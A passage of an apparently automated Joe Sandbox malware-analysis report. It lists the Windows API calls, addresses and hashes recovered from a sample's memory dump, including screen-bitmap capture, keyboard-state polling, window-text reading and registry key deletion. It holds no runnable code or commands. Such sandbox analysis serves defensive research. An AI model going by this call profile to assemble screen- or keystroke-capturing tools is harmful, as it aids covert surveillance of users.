                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EB99FD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0$(
                                                                                                                                                                                                                                                                                                    • API String ID: 1026556194-1385328161
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e1741aa60ca5a014c41bf727648ae8cbdbbe609ed32165ec9ba73c165909012
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3704c4511bbb8e56ce3c465ece695483d0e979031ee676f7f3ff99e064fb9d6e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e1741aa60ca5a014c41bf727648ae8cbdbbe609ed32165ec9ba73c165909012
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA81BF715083019FD724CF25D885AAB7BE8FB89318F101A1DFA85B7292DB30D905CBA2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00EA3035
                                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EA3045
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00EA3051
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00EA305E
                                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EA30CA
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EA3109
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EA312D
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00EA3135
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00EA313E
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00EA3145
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00EA3150
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8a20c5f499b5d27893d27c1d63c50dfc9288c12c22390dcd2877faaabdcca759
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f005180b1e21787874845517d38ad571a69837c22ae14c9f0846bea01ae84c8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a20c5f499b5d27893d27c1d63c50dfc9288c12c22390dcd2877faaabdcca759
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF61C0B5D05219AFCB05CFA8DC84AAEBBF6FF48310F208529E555B7250E771AA41CF90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00E852E6
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00E85328
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E85339
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00E85345
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00E8537A
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E853B2
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00E853EB
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E85445
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00E85477
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E854EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                    • Opcode ID: 086297651383e50c5c3146eeca752a46ab094e2001ce0263bc44fd473760adfb
                                                                                                                                                                                                                                                                                                    • Instruction ID: ee99fbe01ca6cefa787a6ff05e0a9436b53e8500a386ac0eab6b4639084f644d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 086297651383e50c5c3146eeca752a46ab094e2001ce0263bc44fd473760adfb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0291E572104B06AFD709EF24D884BAAB7E9FF01348F005519FA9EA2091EF31ED55CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00EF29C0,000000FF,00000000,00000030), ref: 00E8C973
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(00EF29C0,00000004,00000000,00000030), ref: 00E8C9A8
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00E8C9BA
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00E8CA00
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00E8CA1D
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00E8CA49
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00E8CA90
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8CAD6
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E8CAEB
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E8CB0C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 833b36a3ce4c15939186a0af3c38b9f51b95ae9f18c992249456d0a97ffa20f2
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1b0b6b39c51987874811b05c30890beadf33f4a5ca0c162c5f478b6f3c8ea6c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 833b36a3ce4c15939186a0af3c38b9f51b95ae9f18c992249456d0a97ffa20f2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3618D7090024AAFDB15EF64DC89AEE7BA8EB06348F241555E95EB3151D730AD04CB71
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E8E4D4
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E8E4FA
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E504
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00E8E554
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E8E570
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EAD6C4
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EAD6ED
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EAD7A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EAD70A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EAD71D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EAD72F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EAD765
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EAD788
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EAD753
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00E8EFCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3F215: timeGetTime.WINMM(?,?,00E8EFEB), ref: 00E3F219
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00E8EFF8
                                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E8F01C
                                                                                                                                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E8F03E
                                                                                                                                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 00E8F05D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E8F06B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E8F08A
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00E8F095
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32 ref: 00E8F0A1
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00E8F0B2
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E8F374
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E8F38A
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8F39B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E8F3AD
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E8F3BE
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53007
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4), ref: 00E52D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: GetLastError.KERNEL32(00EF1DC4,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4,00EF1DC4), ref: 00E52D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53013
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5301E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53029
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53034
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5303F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5304A
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53055
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53060
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5306E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID: &
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-2586148540
                                                                                                                                                                                                                                                                                                    • Opcode ID: 163ab2e63a9f3239433c4e3101204d89e2a915a6238aa68bd3855b4489d01c9e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 80cb313e65b0101146c7153ce60e9458e2cb76c18382417074d66ec89f502e72
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 163ab2e63a9f3239433c4e3101204d89e2a915a6238aa68bd3855b4489d01c9e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11B976100108BFCB01EF54C842DDD3BB5EF16351F8198A9FE08AF222DA32DE559B50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8A9D9
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00E8AA44
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00E8AA64
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00E8AA7B
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00E8AAAA
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00E8AABB
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00E8AAE7
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00E8AAF5
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00E8AB1E
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00E8AB2C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00E8AB55
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00E8AB63
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 475febcf89c415f20d7a20f9cd2e6883e6c28a9ddd2774bd41b344e141538144
                                                                                                                                                                                                                                                                                                    • Instruction ID: bc66bbdf185b042765c361084da3f83980bccf26f3a06e8b74bdb8801729bf88
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 475febcf89c415f20d7a20f9cd2e6883e6c28a9ddd2774bd41b344e141538144
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6751D76090878429FB35F7609850BEAAFF55F41344F0C65ABC5CE365C2DA549B4CC763
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00E86649
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E86662
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E866C0
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00E866D0
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E866E2
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E86736
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00E86744
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E86756
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E86798
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00E867AB
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E867C1
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E867CE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 234d5b795672a7e6f84de2f8fb91bc7fd591ff7873aa1b7c111e27ec78f79049
                                                                                                                                                                                                                                                                                                    • Instruction ID: 06ad147872fd02749538cde7eca4e1433696289937caed1ce0fafec8ed96baab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 234d5b795672a7e6f84de2f8fb91bc7fd591ff7873aa1b7c111e27ec78f79049
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84513070A00219AFDF18DF69DD85AAEBBB5FB48314F108229F519F7294E7709D04CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00E22152
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E628D1
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E628EA
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E628FA
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E62912
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E62933
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E62942
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E6295F
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E6296E
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 1268354404-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetCursorPos.USER32(?), ref: 00E219E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: ScreenToClient.USER32(00000000,?), ref: 00E219FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000001), ref: 00E21A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000002), ref: 00E21A3D
                                                                                                                                                                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00EB95C7
                                                                                                                                                                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00EB95CD
                                                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 00EB95D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00EB966E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EB9681
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00EB975B
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
                                                                                                                                                                                                                                                                                                    • API String ID: 1924731296-3832140312
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E70D31,00000001,0000138C,00000001,00000000,00000001,?,00E9EEAE,00EF2430), ref: 00E8A091
